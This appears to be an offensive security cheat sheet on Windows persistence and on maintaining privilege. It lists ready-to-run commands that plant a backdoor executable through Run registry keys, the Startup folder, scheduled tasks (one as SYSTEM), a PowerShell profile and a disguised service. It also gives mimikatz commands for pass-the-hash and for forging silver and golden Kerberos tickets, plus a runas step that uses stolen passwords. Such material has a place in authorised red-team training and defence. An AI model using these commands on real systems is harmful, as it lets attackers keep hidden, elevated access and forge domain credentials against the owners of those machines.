# Userland techniques# HKCU# Create a REG_SZ value in the Run key within HKCU\Software\Microsoft\Windows. (Other keys are available).
Value name: Backdoor
Value data: C:\Users\Rasta\AppData\Local\Temp\backdoor.exe
# Start-up# Create a batch script in the user startup folder.
PS C:\> gc C:\Users\Rasta\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\backdoor.bat
start /b C:\Users\Rasta\AppData\Local\Temp\backdoor.exe
# Scheduled Tasks
PS C:\>$A= New-ScheduledTaskAction -Execute "cmd.exe" -Argument "/c C:\Users\Rasta\AppData\Local\Temp\backdoor.exe"
PS C:\>$T= New-ScheduledTaskTrigger -AtLogOn -User "Rasta"
PS C:\>$P= New-ScheduledTaskPrincipal "Rasta"
PS C:\>$S= New-ScheduledTaskSettingsSet
PS C:\>$D= New-ScheduledTask -Action $A -Trigger $T -Principal $P -Settings $S
PS C:\> Register-ScheduledTask Backdoor -InputObject $D# Powershell profiles# You can backdoor the powershell profile
PS C:\> Test-Path $profile
False
PS C:\> New-Item -Path $profile -Type File –Force
Directory: C:\Users\Rasta\Documents\WindowsPowerShell
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 22/03/2018 12:42 0 Microsoft.PowerShell_profile.ps1
PS C:\>$string='Start-Process "cmd.exe"'
PS C:\>$string| Out-File -FilePath "C:\Users\Rasta\Documents\WindowsPowerShell\Microsoft.PowerShell_profile.ps1" -Append
# Elevated techniques# HKLM# Similar to HKCU. Create a REG_SZ value in the Run key within HKLM\Software\Microsoft\Windows
Value name: Backdoor
Value data: C:\Windows\Temp\backdoor.exe
# Services# Create a service that will start automatically or on-demand.
PS C:\> New-Service -Name "Backdoor" -BinaryPathName "C:\Windows\Temp\backdoor.exe" -Description "Nothing to see here."# Scheduled Tasks
PS C:\>$A= New-ScheduledTaskAction -Execute "cmd.exe" -Argument "/c C:\Windows\Temp\backdoor.exe"
PS C:\>$T= New-ScheduledTaskTrigger -Daily -At 9am
PS C:\>$P= New-ScheduledTaskPrincipal "NT AUTHORITY\SYSTEM" -RunLevel Highest
PS C:\>$S= New-ScheduledTaskSettingsSet
PS C:\>$D= New-ScheduledTask -Action $A -Trigger $T -Principal $P -Settings $S
PS C:\> Register-ScheduledTask Backdoor -InputObject $D
Maintaining Privilege
# Steal passwords and use them with runas
runas /netonly /user:FS01\Administrator cmd
# If you can’t get passwords, use NTLM hashes with techniques such as Pass-the-Hash or psexec.# Both domain accounts and local accounts can work.
mimikatz> sekurlsa::pth /user:Administrator /domain:FS01 /rc4:fc525c9683e8fe067095ba2ddc971889 /ptt
# Adding new local users can be a method to get back into machines# Administrators local group is a solution, but you can also use the following groups
Remote Desktop Users
Remote Management Users
Backup Operators
# With the NTLM hash of a computer account, silver tickets can be used to regain local admin privileges via the CIFS service.
mimikatz> kerberos::golden /user:Administrator /domain:testlab.local /sid:S-1-5-21-1516486103-3973840447-1748718438 /target:fs01 /rc4:47b1d9d581f29b3b43845692bd4a0322 /service:cifs /ptt
# Golden tickets can be used to forge access to any service in the domain.
mimikatz> kerberos::golden /user:Administrator /domain:testlab.local /sid:S-1-5-21-1516486103-3973840447-1748718438 /rc4:9063b8edb3d04ed734edd49e5b0adef3 /ptt